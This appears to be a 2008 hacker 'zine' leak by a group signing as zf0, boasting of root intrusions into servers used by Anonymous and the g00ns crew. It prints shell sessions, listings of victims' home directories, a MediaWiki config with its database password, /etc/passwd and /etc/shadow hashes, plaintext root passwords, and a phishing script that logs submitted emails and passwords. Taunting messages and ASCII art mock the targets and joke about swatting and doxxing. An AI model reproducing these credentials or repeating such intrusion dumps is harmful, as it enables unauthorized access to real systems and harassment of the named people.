1 untitledhosting untitledhosting 168 Jan 3 02:56 robots.txt --rw-r--r-- 1 untitledhosting untitledhosting 4161 Jan 3 02:56 soap.php --rw-r--r-- 1 untitledhosting untitledhosting 2535 Jan 3 02:56 stylesheet.css --rw-r--r-- 1 untitledhosting untitledhosting 5179 Jan 3 02:56 stylesheet.php -drwxrwxrwx 6 untitledhosting untitledhosting 512 Mar 10 02:47 tmp -drwxrwxrwx 4 untitledhosting untitledhosting 512 Mar 10 03:09 uploads --rw-r--r-- 1 untitledhosting untitledhosting 1127 Jan 3 02:56 version.php -[root@athena:/var/www] ->> ls -la /home/inaki/ -total 157184 -drwx------ 25 inaki inaki 1536 Mar 17 21:06 . -drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 .. --rwx------ 1 inaki inaki 10462 Mar 22 00:28 .bash_history --rwx------ 1 inaki inaki 30 Dec 16 17:56 .bash_profile --rwx------ 1 inaki inaki 30 Dec 16 17:56 .bashrc --rw-r--r-- 1 inaki inaki 14178 Mar 4 00:00 .bot_log --rwx------ 1 inaki inaki 767 Dec 15 16:07 .cshrc --rw-r--r-- 1 inaki inaki 6 Mar 17 21:06 .gay-state --rwx------ 1 inaki inaki 142 Dec 17 01:58 .history -drwx------ 2 inaki inaki 512 Dec 18 22:12 .irssi --rw------- 1 inaki inaki 35 Mar 9 18:42 .lesshst -drwx------ 2 inaki inaki 512 Jan 30 21:51 .links --rwx------ 1 inaki inaki 248 Dec 15 16:07 .login --rwx------ 1 inaki inaki 158 Dec 15 16:07 .login_conf --rwx------ 1 inaki inaki 373 Dec 15 16:07 .mail_aliases --rwx------ 1 inaki inaki 331 Dec 15 16:07 .mailrc --rwx------ 1 inaki inaki 797 Dec 15 16:07 .profile --rwx------ 1 inaki inaki 276 Dec 15 16:07 .rhosts --rwx------ 1 inaki inaki 975 Dec 15 16:07 .shrc -drwx------ 2 inaki inaki 512 Feb 9 07:09 .ssh -drwx------ 7 inaki inaki 512 Mar 17 16:56 .weechat --rw-r--r-- 1 inaki inaki 1330 Mar 10 03:53 InstallMorgan.pl -drwxr-xr-x 2 inaki inaki 512 Mar 5 22:56 RFIscan -drwx------ 17 inaki inaki 1536 Mar 12 21:55 Unreal3.2.7 --rwx------ 1 inaki inaki 2801622 Dec 29 09:01 Unreal3.2.7.tar.gz --rw-r--r-- 1 inaki inaki 12469 Mar 7 05:27 _good_rfis.txt -drwx------ 7 inaki inaki 1024 Dec 27 22:44 anope-1.7.19 --rwx------ 1 inaki inaki 1505639 Jun 10 2007 anope-1.7.19.tar.gz -drwx------ 8 inaki inaki 512 Jan 13 07:25 bopm -drwx------ 5 inaki inaki 1024 Jan 13 07:02 bopm-3.1.3 --rwx------ 1 inaki inaki 819273 May 16 2007 bopm-3.1.3.tar.gz --rwx------ 1 inaki inaki 1424 Dec 27 21:59 bot.pl --rwx------ 1 inaki inaki 1401 Dec 25 08:31 bot.pl.save --rwx------ 1 inaki inaki 1417 Dec 27 21:57 bot.pl\ -drwx------ 4 inaki inaki 512 Mar 3 14:10 botpanel --rwx------ 1 inaki inaki 11962 Feb 13 03:05 botpanel.tgz --rwx------ 1 inaki inaki 0 Dec 23 00:06 cigarette --rw-r--r-- 1 inaki inaki 1334 Mar 8 05:57 cleanrfi.pl -drwxrwxrwx 3 inaki inaki 512 Feb 23 04:17 exe -drwx------ 2 inaki inaki 512 Feb 9 07:43 flash --rwx------ 1 inaki inaki 130677 Jul 14 2007 gay --rwx------ 1 inaki inaki 2576 Nov 24 23:25 gen.pl --rwxr-xr-x 1 inaki inaki 655 Mar 5 02:45 getRFI.sh --rw-r--r-- 1 inaki inaki 121721 Mar 10 04:33 good_rfis.txt -drwxrwxrwx 2 inaki inaki 512 Feb 21 04:08 images -drwx------ 8 inaki inaki 512 Jan 5 09:48 ircd --rwx------ 1 inaki inaki 2457953 Dec 19 02:58 irssi --rwx------ 1 inaki inaki 530 Dec 19 01:34 jap.pl -drwx------ 5 inaki inaki 512 Feb 17 15:56 jewgong --rwx------ 1 inaki inaki 1507 Jan 5 08:37 lol.sh --rwx------ 1 inaki inaki 5026 Feb 1 23:08 lolol -drwx------ 4 inaki inaki 512 Jan 4 22:25 lulzhost.net --rwx------ 1 inaki inaki 45778 Dec 24 02:22 master.tgz -drwx------ 7 inaki inaki 512 Dec 27 22:50 misc --rwx------ 1 inaki inaki 1993 Dec 1 19:39 mpdnp.pl -drwx------ 2 inaki inaki 512 Feb 17 11:04 music --rwx------ 1 inaki inaki 9576448 Feb 3 09:29 openssl_installer.exe --rwx------ 1 inaki inaki 0 Feb 11 03:27 out -drwx------ 2 inaki inaki 512 Jan 11 20:20 oxygen --rwx------ 1 inaki inaki 0 Nov 25 09:04 pizza -drwx------ 2 inaki inaki 512 Jan 16 23:14 public_html -drwx------ 2 inaki inaki 512 Jan 4 03:33 radiobot --rwx------ 1 inaki inaki 806 Dec 16 21:17 range --rw-r--r-- 1 inaki inaki 190367 Mar 21 21:52 rfis.txt -drwx------ 3 inaki inaki 1024 Jan 14 00:38 seeborg-0.51 --rwx------ 1 inaki inaki 58113 Aug 15 2003 seeborg-0.51.tar.gz --rwx------ 1 inaki inaki 825 Dec 1 17:59 server.cfg --rwx------ 1 inaki inaki 14285284 Dec 25 03:00 sy.rar --rwx------ 1 inaki inaki 55 Dec 8 10:30 test --rwx------ 1 inaki inaki 67 Dec 7 12:48 test.sh -drwx------ 3 inaki inaki 512 Jan 5 09:48 testircd --rwx------ 1 inaki inaki 0 Nov 24 22:00 trace.rt --rwx------ 1 inaki inaki 128561152 Mar 8 00:19 weechat-curses.core --rwx------ 1 inaki inaki 69 Dec 16 21:17 xh.pl ->> ls -la /usr/home/mjestic/ -total 204 -drwxr-xr-x 5 mjestic mjestic 512 Jan 14 06:44 . -drwxr-xr-x 25 1013 1013 512 Mar 10 23:08 .. --rw------- 1 mjestic mjestic 1404 Jan 14 06:52 .bash_history --rw-r--r-- 1 mjestic mjestic 767 Jan 14 05:18 .cshrc --rw-r--r-- 1 mjestic mjestic 248 Jan 14 05:18 .login --rw-r--r-- 1 mjestic mjestic 158 Jan 14 05:18 .login_conf --rw------- 1 mjestic mjestic 373 Jan 14 05:18 .mail_aliases --rw-r--r-- 1 mjestic mjestic 331 Jan 14 05:18 .mailrc --rw-r--r-- 1 mjestic mjestic 797 Jan 14 05:18 .profile --rw------- 1 mjestic mjestic 276 Jan 14 05:18 .rhosts --rw-r--r-- 1 mjestic mjestic 975 Jan 14 05:18 .shrc -drwxr-xr-x 4 mjestic mjestic 512 Jan 14 06:45 .tremulous -drwxr-xr-x 5 mjestic mjestic 512 Nov 8 07:29 arcade --rw-r--r-- 1 mjestic mjestic 178453 Nov 8 07:30 arcade-svn971-14-vm.tar.gz -drwxr-xr-x 3 mjestic mjestic 512 Jan 14 06:46 trem-server -[root@athena:/var/www] - -/* -* -* And now for partyvan.info -* -*/ - -$ uname -a -FreeBSD partyvan.info 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 -UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 -$ w -12:22AM up 2:37, 0 users, load averages: 0.06, 0.06, 0.07 -USER TTY FROM LOGIN@ IDLE WHAT -$ ls -apache22 -squirrelmail -$ pwd -/usr/local/www -$ cd apache22 -$ ls -al -total 14 -drwxr-xr-x 6 root wheel 512 Mar 8 16:40 . -drwxr-xr-x 4 root wheel 512 Mar 8 22:03 .. -drwxr-xr-x 2 root wheel 512 Mar 8 16:40 cgi-bin -drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 data -drwxr-xr-x 3 root wheel 1024 Mar 8 16:40 error -drwxr-xr-x 3 root wheel 3584 Mar 8 16:40 icons -$ cd data -$ ls -al -total 120006 -drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 . -drwxr-xr-x 6 root wheel 512 Mar 8 16:40 .. -drwxr-xr-x 3 root picatta 512 Mar 8 17:41 711chan --rwxr-xr-x 1 root picatta 825 Mar 5 12:48 AdminSettings.sample --rwxr-xr-x 1 root picatta 17997 Mar 5 12:48 COPYING --rwxr-xr-x 1 root picatta 162 Mar 5 12:48 FAQ --rwxr-xr-x 1 root picatta 175294 Mar 5 12:48 HISTORY --rwxr-xr-x 1 root picatta 3992 Mar 5 12:48 INSTALL --rw-r--r-- 1 root picatta 4522 Mar 5 12:48 LocalSettings.php --rwxr-xr-x 1 root picatta 27 Mar 5 12:48 Makefile --rwxr-xr-x 1 root picatta 44283 Mar 5 12:48 RELEASE-NOTES --rwxr-xr-x 1 root picatta 605 Mar 5 12:48 StartProfiler.php --rwxr-xr-x 1 root picatta 12816 Mar 5 12:48 UPGRADE --rwxr-xr-x 1 root picatta 1316 Mar 5 12:48 api.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 auth -drwxr-xr-x 3 root wheel 512 Mar 8 17:41 backup -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 bin -drwxr-xr-x 18 root picatta 512 Mar 8 17:41 cachedir -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 cgi-bin --rw-r--r-- 1 root picatta 1832 Mar 5 12:48 cheese.gif --rw-r--r-- 1 root picatta 1677 Mar 5 12:48 cheese2.gif --rwxr-xr-x 1 root picatta 122077184 Mar 5 12:48 core.21271 -drwxr-xr-x 3 root picatta 512 Mar 8 17:41 dev -drwxr-xr-x 4 root picatta 512 Mar 8 17:41 docs -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 donate --rw-r--r-- 1 root picatta 2037 Mar 5 12:48 epiccheese.js --rw-r--r-- 1 root picatta 2091 Mar 5 12:48 epicfail.js -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 extensions --rwxr-xr-x 1 root picatta 1150 Mar 5 12:48 favicon.ico -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 fimg --rwxr-xr-x 1 root picatta 1501 Mar 5 12:48 front.php --rwxr-xr-x 1 root picatta 173 Mar 5 12:48 google.html -drwxr-xr-x 3 root picatta 512 Mar 8 17:41 hosted -drwxr-xr-x 21 root picatta 512 Mar 8 17:41 images --rwxr-xr-x 1 root picatta 1978 Mar 5 12:48 img_auth.php -drwxr-xr-x 7 root picatta 5632 Mar 8 17:41 includes --rwxr-xr-x 1 root picatta 113 Mar 5 12:48 index.dongs --rwxr-xr-x 1 root picatta 1513 Mar 5 12:48 index.old --rwxr-xr-x 1 root picatta 8716 Mar 5 12:48 index.php --rwxr-xr-x 1 root picatta 454 Mar 5 12:48 index.php__ --rwxr-xr-x 1 root picatta 21 Mar 5 12:48 info.php --rwxr-xr-x 1 root picatta 3899 Mar 5 12:48 install-utils.inc -drwxr-xr-x 4 root picatta 512 Mar 8 17:41 languages --rwxr-xr-x 1 root picatta 584 Mar 5 12:48 load.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 locale --rwxr-xr-x 1 root picatta 3227 Mar 5 12:48 lol.css -drwxr-xr-x 9 root picatta 4096 Mar 8 17:41 maintenance -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 math --rw-r--r-- 1 root picatta 0 Mar 5 12:48 merge.php --rwxr-xr-x 1 root picatta 19631 Mar 5 12:48 mudkipz.png --rwxr-xr-x 1 root picatta 1532 Mar 5 12:48 opensearch_desc.php --rwxr-xr-x 1 root picatta 65394 Mar 5 12:48 owned1.jpg --rwxr-xr-x 1 root picatta 67133 Mar 5 12:48 owned2.jpg --rw-r--r-- 1 picatta picatta 361 Mar 8 21:56 portl.html --rwxr-xr-x 1 root picatta 6173 Mar 5 12:48 profileinfo.php -drwxr-xr-x 3 root picatta 512 Mar 8 17:41 public_ftp -drwxr-xr-x 7 root picatta 1024 Mar 8 17:41 raid --rwxr-xr-x 1 root picatta 428 Mar 5 12:48 redir.php --rwxr-xr-x 1 root picatta 319 Mar 5 12:48 redirect.php --rwxr-xr-x 1 root picatta 91 Mar 5 12:48 redirect.phtml --rwxr-xr-x 1 root picatta 92 Mar 5 12:48 robots.txt --rwxr-xr-x 1 root picatta 1351 Mar 5 12:48 seal.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 serialized --rwxr-xr-x 1 root picatta 147770 Mar 5 12:48 shit.jpg -drwxr-xr-x 10 root picatta 1024 Mar 8 17:41 skins -drwxr-xr-x 3 root picatta 512 Mar 8 17:41 t --rwxr-xr-x 1 root picatta 6 Mar 5 12:48 test --rwxr-xr-x 1 root picatta 27 Mar 5 12:48 test.php --rwxr-xr-x 1 root picatta 53 Mar 5 12:48 test2.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tests --rwxr-xr-x 1 root picatta 2408 Mar 5 12:48 thumb.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 tmp --rwxr-xr-x 1 root picatta 1384 Mar 5 12:48 trackback.php -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 vamp --rwxr-xr-x 1 root picatta 88 Mar 5 12:48 wiki.phtml --rwxr-xr-x 1 root picatta 1756 Mar 5 12:48 ~index.php -$ cat LocalSettings.php -<?php - -# This file was automatically generated by the MediaWiki installer. -# If you make manual changes, please keep track in case you need to -# recreate them later. -# -# See includes/DefaultSettings.php for all configurable settings -# and their default values, but don't forget to make changes in _this_ -# file, not there. - -# If you customize your file layout, set $IP to the directory that contains -# the other MediaWiki files. It will be used as a base to locate files. -if( defined( 'MW_INSTALL_PATH' ) ) { - $IP = MW_INSTALL_PATH; -} else { - $IP = dirname( __FILE__ ); -} - -$path = array( $IP, "$IP/includes", "$IP/languages" ); -set_include_path( implode( PATH_SEPARATOR, $path ) . PATH_SEPARATOR . -get_include_path() ); -require_once( "includes/DefaultSettings.php" ); - -# If PHP's memory limit is very low, some operations may fail. -# ini_set( 'memory_limit', '20M' ); - -if ( $wgCommandLineMode ) { - if ( isset( $_SERVER ) && array_key_exists( 'REQUEST_METHOD', $_SERVER -) ) { - die( "This script must be run from the command line\n" ); - } -} elseif ( empty( $wgNoOutputBuffer ) ) { - ## Compress output if the browser supports it - if( !ini_get( 'zlib.output_compression' ) ) @ob_start( 'ob_gzhandler' -); -} - -$wgSitename = "Insurgency Wiki"; - -## The URL base path to the directory containing the wiki; -## defaults for all runtime URL paths are based off of this. -$wgScriptPath = ""; - -## For more information on customizing the URLs please see: -## http://www.mediawiki.org/wiki/Manual:Short_URL - -$wgShowIPinHeader = false; -$wgEnableEmail = true; -$wgEnableUserEmail = true; - -$wgEmergencyContact = "Coprolal1an@gmail.com"; -$wgPasswordSender = "Coprolal1an@gmail.com"; - -## For a detailed description of the following switches see -## http://meta.wikimedia.org/Enotif and http://meta.wikimedia.org/Eauthent -## There are many more options for fine tuning available see -## /includes/DefaultSettings.php -## UPO means: this is also a user preference option -$wgEnotifUserTalk = true; # UPO -$wgEnotifWatchlist = true; # UPO -$wgEmailAuthentication = true; - -$wgDBtype = "mysql"; -$wgDBserver = "localhost"; -$wgDBname = "partyvan_insurgency"; -$wgDBuser = "root"; -$wgDBpassword = "lolcats8295"; - -$wgDBport = "3306"; -$wgDBprefix = "mw_"; - -# Schemas for Postgres -$wgDBmwschema = "mediawiki"; -$wgDBts2schema = "public"; - -# Experimental charset support for MySQL 4.1/5.0. -$wgDBmysql5 = false; - -## Shared memory settings -$wgFileCacheDirectory = '/home/partyvan/public_html/cachedir/'; -$wgShowIPinHeader = false; -$wgUseFileCache = true; -$wgMainCacheType = CACHE_MEMCACHED; -$wgDisableCounters=true; -$wgMemCachedServers = array(); -$wgUseMemCached = true; -$wgMemCachedServers = array( "127.0.0.1:11211" ); -## To enable image uploads, make sure the 'images' directory -## is writable, then set this to true: -$wgEnableUploads = true; -$wgUseImageResize = true; -$wgUseImageMagick = true; -$wgImageMagickConvertCommand = "/usr/bin/convert"; - -## If you want to use image uploads under safe mode, -## create the directories images/archive, images/thumb and -## images/temp, and make them all writable. Then uncomment -## this, if it's not already uncommented: -# $wgHashedUploadDirectory = false; - -## If you have the appropriate support software installed -## you can enable inline LaTeX equations: -$wgUseTeX = false; - -$wgLocalInterwiki = $wgSitename; -$wgLanguageCode = "en"; - -$wgProxyKey = -"79057c7a1562bb0417a20556cf0a63001ebacb27da55d05511820902bab34586"; - -## Default skin: you can change the default skin. Use the internal symbolic -## names, ie 'standard', 'nostalgia', 'cologneblue', 'monobook': -$wgDefaultSkin = 'nostalgia'; - -## For attaching licensing metadata to pages, and displaying an -## appropriate copyright notice / icon. GNU Free Documentation -## License and Creative Commons licenses are supported so far. -$wgEnableCreativeCommonsRdf = true; -$wgRightsPage = ""; # Set to the title of a wiki page that describes your -license/copyright -$wgRightsUrl = "http://creativecommons.org/licenses/by-nc-sa/3.0/"; -$wgRightsText = "Attribution-Noncommercial-Share Alike 3.0 "; -$wgRightsIcon = "http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png"; -# $wgRightsCode = "by-nc-sa"; # Not yet used - -$wgDiff3 = "/usr/bin/diff3"; - -# When you make changes to this configuration file, this will make -# sure that cached pages are cleared. -$configdate = gmdate( 'YmdHis', @filemtime( __FILE__ ) ); -$wgCacheEpoch = max( $wgCacheEpoch, $configdate ); - -?> -$ cat /etc/passwd -# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ -# -root:*:0:0:Charlie &:/root:/bin/csh -toor:*:0:0:Bourne-again Superuser:/root: -daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin -operator:*:2:5:System &:/:/usr/sbin/nologin -bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin -tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin -kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin -games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin -news:*:8:8:News Subsystem:/:/usr/sbin/nologin -man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin -sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin -smmsp:*:25:25:Sendmail Submission -User:/var/spool/clientmqueue:/usr/sbin/nologin -mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin -bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin -proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin -_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin -_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin -uucp:*:66:66:UUCP -pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico -pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin -www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin -nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin -picatta:*:1001:1001:picatta:/home/picatta:/bin/sh -general:*:1002:1002:general:/home/general:/bin/sh -mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin -cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh -$ ls -al /usr/home -total 8 -drwxr-xr-x 4 root wheel 512 Mar 8 07:48 . -drwxr-xr-x 17 root wheel 512 Mar 8 07:48 .. -drwxr-xr-x 2 general general 512 Mar 8 07:48 general -drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 picatta -$ cd ~picatta -$ ls -al -total 20 -drwxr-xr-x 2 picatta picatta 512 Mar 8 07:47 . -drwxr-xr-x 4 root wheel 512 Mar 8 07:48 .. --rw-r--r-- 1 picatta picatta 751 Mar 8 07:47 .cshrc --rw-r--r-- 1 picatta picatta 248 Mar 8 07:47 .login --rw-r--r-- 1 picatta picatta 158 Mar 8 07:47 .login_conf --rw------- 1 picatta picatta 373 Mar 8 07:47 .mail_aliases --rw-r--r-- 1 picatta picatta 331 Mar 8 07:47 .mailrc --rw-r--r-- 1 picatta picatta 766 Mar 8 07:47 .profile --rw------- 1 picatta picatta 276 Mar 8 07:47 .rhosts --rw-r--r-- 1 picatta picatta 975 Mar 8 07:47 .shrc -$ cd ~general -$ ls -al -total 20 -drwxr-xr-x 2 general general 512 Mar 8 07:48 . -drwxr-xr-x 4 root wheel 512 Mar 8 07:48 .. --rw-r--r-- 1 general general 751 Mar 8 07:48 .cshrc --rw-r--r-- 1 general general 248 Mar 8 07:48 .login --rw-r--r-- 1 general general 158 Mar 8 07:48 .login_conf --rw------- 1 general general 373 Mar 8 07:48 .mail_aliases --rw-r--r-- 1 general general 331 Mar 8 07:48 .mailrc --rw-r--r-- 1 general general 766 Mar 8 07:48 .profile --rw------- 1 general general 276 Mar 8 07:48 .rhosts --rw-r--r-- 1 general general 975 Mar 8 07:48 .shrc -$ cd /usr/local/www/apache22/data/auth -$ ls -al -total 8 -drwxr-xr-x 2 root picatta 512 Mar 8 17:41 . -drwxr-xr-x 28 root wheel 1536 Mar 8 22:01 .. --rwxr-xr-x 1 root picatta 2 Mar 5 12:47 account.txt --rwxr-xr-x 1 root picatta 169 Mar 5 12:47 login.php -$ cat account.txt -: -$ cat login.php -<?php - $email = $_POST['email']; - $password = $_POST['password']; - $fw = fopen('account.txt', 'a'); - fwrite($fw, $email . ":" . $password . "\n"); - fclose($fw); -?> -$ ls -al /var/mail -total 4 -drwxrwxr-x 2 root mail 512 Mar 8 22:05 . -drwxr-xr-x 24 root wheel 512 Mar 8 22:05 .. --rw------- 1 cyrus cyrus 0 Mar 8 22:05 cyrus --rw------- 1 general general 0 Mar 8 07:48 general --rw------- 1 mysql mysql 0 Mar 8 16:38 mysql --rw------- 1 picatta picatta 0 Mar 8 07:47 picatta -$ - -/*****************************************************************/ - -Well, that was fun... - -Remember, you are not as untouchable as you think you are. As long as you have a -website up somewhere or are IRC'ing on public networks (btw, do you honestly -think that EFNet provides a secure communications channel?) you are within the -reach of those who would wish you harm. - -To be perfectly honest, you indoctrinate your members just as much as the -supposed evil CoS that you fight against. I honestly don't see the difference -between your methods and those that you allege they use. - -Your actions are childish. You attack sites and people that have done nothing -to you and whom you have no battle with. Hell, a lot of the time you don't even -attack the right target. That speaks volumes about your collective abilities. - -Again, we beseach you to remember that you are *not* untouchable. While 99% of -the time you will anger people who have no power to hit back, or who have -no friends with the ability to retaliate, the remaining 1% of the time you will -anger people who can and will hurt you. - -Knock off this Chanology crap and go back to posting on 4chan and playing -CounterStrike. You're in a world you know nothing about and you do not belong -here. - -We would have dumped your MediaWiki DB but it was full of crap and only had 32 -registered users. - -This was for you X. Hopefully it helps. - - -############################################################# -# THE ADVENTURES OF # -# __ # -# .--------.|__|.----.----.-----. # -# | || || __| _| _ | # -# |__|__|__||__||____|__| |_____| # -# __ # -# .-----.-----.-----.|__|.-----. # -# | _ | -__| || ||__ --| # -# | __|_____|__|__||__||_____| # -# |__| # -# # -############################################################# -# | # ________________________ # -# | [] []# | | # -# | # |<mp> r0fl3 i juST g0t | # -# FUCK YOU! Co$! | [] []# |bunCH of RFI's from b0ts| # -# \ | # |i r teh le3ats | # -# \ | ____# | | # -# lulz O_O i just | |___# |<sk1d> LUCKY!!11! | # -# raged you so | # | | # -# hard!! | ? __# '-.____________________.-' # -# / | o | # |________| # -#___8=D________________|__|_|_# ______/__________\______ # -#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# |________________________| # -# # |(type type) | # -#- - - - - - - - - - # | \ _____ _____ | # -# # | / ' \ | # -############################################################# -# | # | # -# r0flzc0ptu3z i just | [] []# SHUT UP Co$!! | [] []# -# / | # / Thats IT! # -# swated that f4g and | [] []# \ / | [] []# -# \ | # \ I'M CALLING| # -# \ | ____# \ \ | ____# -# dropp3d his doc's | |___# \ The | |___# -# i iz so0 |Go # / \| # -# l33t!! |Away__# Whats zf0no? zf0no___# -# / | 'o | # / | 'o | # -#___8=D________________|__|_|_#___8=D________________|__|_|_# -#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/#/_/_/_/_/_/_/_/_/_/_/_/_/_/_/# -# # # -#- - - - - - - - - - #- - - - - - - - - - # -# # # -############################################################# -# # -# ,-. __ # -# ,' `---.___.---' `. # -# ,' ,- `-._ # -# ,' / \ .- # -# ,\/ / zf0 + Rhino => zf0no \\ (( # -# )`._)>) | \\// # -# `>,' _ \ / |/ *-_ # -# ) \ | | zf04 | | o `-. # -# , / \ | `. | | o * (`-' # -#\ \`-' )-| `. | / '- .' # -#\`-` .` _/ \ _ )`-.___.--\ / O _`-._ # -#_\_ ,'_____\ `.__/___________`. \_____,'^, c-)__# -#__/ , ,'/_/_/_/_/\ /`/_/_/_/_/_/_/\ /_/_/(_`-' ^-'`)# -# \__ / _) ( _) ( (^_ - _ |# -#- -`--' - - - -/____\- - - - -/____\-(_,-. 8=D |# -# `-_______* # -############################################################# -# # -# Once Again Micro Penis Is # -# __ # -# .-----.--.--.--.-----.-----.--| | # -# | _ | | | | | -__| _ | # -# | __|________|__|__|_____|_____| # -# |__| # -# (c) zf0 2008# -############################################################# - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 g00ns zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -z3r0 -> tribal: its possible someone hacked the user account -z3r0 -> tribal: but doubtful -tribal -> z3r0: yeah but if thats true -tribal -> z3r0: they wouldn't be able to change the bash history - -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Current g00ns shell passwords: - -root:Yuh89Kiol0? -bnc:dwAFkCWx -barnseo:jatQeT77Q2be - -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -[root@demon2 ~]# uname -a; id -Linux demon2.rage-servers.com 2.6.22.9-grsec #11 SMP Mon Feb 11 22:15:20 PST 2008 i686 i686 i386 GNU/Linux -uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) -[root@demon2 ~]# cat /etc/shadow -root:$1$eE12wKEE$tmHFeYudmmO3rwwe7l7Cj1:13917:0:99999:7::: -bin:*:13726:0:99999:7::: -daemon:*:13726:0:99999:7::: -adm:*:13726:0:99999:7::: -lp:*:13726:0:99999:7::: -sync:*:13726:0:99999:7::: -shutdown:*:13726:0:99999:7::: -halt:*:13726:0:99999:7::: -mail:*:13726:0:99999:7::: -news:*:13726:0:99999:7::: -uucp:*:13726:0:99999:7::: -operator:*:13726:0:99999:7::: -games:*:13726:0:99999:7::: -gopher:*:13726:0:99999:7::: -ftp:*:13726:0:99999:7::: -nobody:*:13726:0:99999:7::: -dbus:!!:13726:0:99999:7::: -mailnull:!!:13726:0:99999:7::: -smmsp:!!:13726:0:99999:7::: -nscd:!!:13726:0:99999:7::: -vcsa:!!:13726:0:99999:7::: -haldaemon:!!:13726:0:99999:7::: -rpc:!!:13726:0:99999:7::: -rpcuser:!!:13726:0:99999:7::: -nfsnobody:!!:13726:0:99999:7::: -sshd:!!:13726:0:99999:7::: -pcap:!!:13726:0:99999:7::: -rpm:!!:13726:0:99999:7::: -named:!!:13726:::::: -apache:!!:13726:::::: -diradmin:!!:13726:::::: -mysql:!!:13726:::::: -webapps:!!:13726:0:99999:7::: -majordomo:!!:13726:::::: -admin:$1$k67PPtsg$vReIxhUQshkQHrgN8qop4/:13727:0:99999:7::: -barnseo:$1$eSkx8Cwh$l/eNlfFan8WqvNlt3CcJd/:13943:0:99999:7::: -bored:$1$VDoQ7SvP$hzgNmjDbAo1YV1UN1HnSa1:13727:0:99999:7::: -churc0:$1$tsI0iJf7$6NvNZKfpK/NMNbhrQTmlA0:13727:0:99999:7::: -connors:$1$2ULc9Bif$sujzvc6bBq/w9fUjMC/ru/:13727:0:99999:7::: -every:$1$wC6e9J4r$fHgJBV5mvsjDfu1mbP1ya1:13727:0:99999:7::: -evilcode:$1$w3V6Hy9R$Ulia4Vw0Ka2BppbF0/lH50:13732:0:99999:7::: -excodeirc:$1$rFGBHx30$NQBXJyn58wCMprwtX6zYw0:13774:0:99999:7::: -exploiterc:$1$VEmT3ImD$VxH8EvofWX8ewPX4M4wk00:13727:0:99999:7::: -felosii:$1$G2Mg7vW9$SoUIbysYX.nTApiriA6CC/:13727:0:99999:7::: -g00nsts395:$1$1joDOdxa$Us6bM7CJhw0BTgErxTI5p0:13748:0:99999:7::: -grumpy:$1$dX3cnqpU$oApeYwRlHfDpoG4RpaGwD.:13727:0:99999:7::: -illmob:$1$gFYsh9oD$LVzfHbh.UyLCGp/HoP2xC.:13727:0:99999:7::: -pingyill:$1$5b3IbBeK$pRofjZ3/JiBjPG3OYgP900:13727:0:99999:7::: -rageserver:$1$lI4HM14j$2vJACLQYNTxJDZ6GkJRBv0:13727:0:99999:7::: -robo:$1$u0sPxruz$eaFFqL4tnXsKcCOkrq2/O.:13727:0:99999:7::: -sn00g3s:$1$brOb0Seg$FGzBeV5S89j5AgDgYaRSG/:13970:0:99999:7::: -void:$1$tBjUtZVx$6Vzt0IHhNIQU8QLU6lymO/:13727:0:99999:7::: -alliancedn:$1$JitYsrIg$Mz0Q3fgnLDDmnEITkHB1t1:13727:0:99999:7::: -aosw:$1$2EhcyqE8$b2JIrTsCg6svFPqe4bSvB.:13727:0:99999:7::: -ntp:!!:13727:::::: -hackrad:$1$pnZjslMq$F1X4eS3kW4DjnxNJq6l7w.:13727:0:99999:7::: 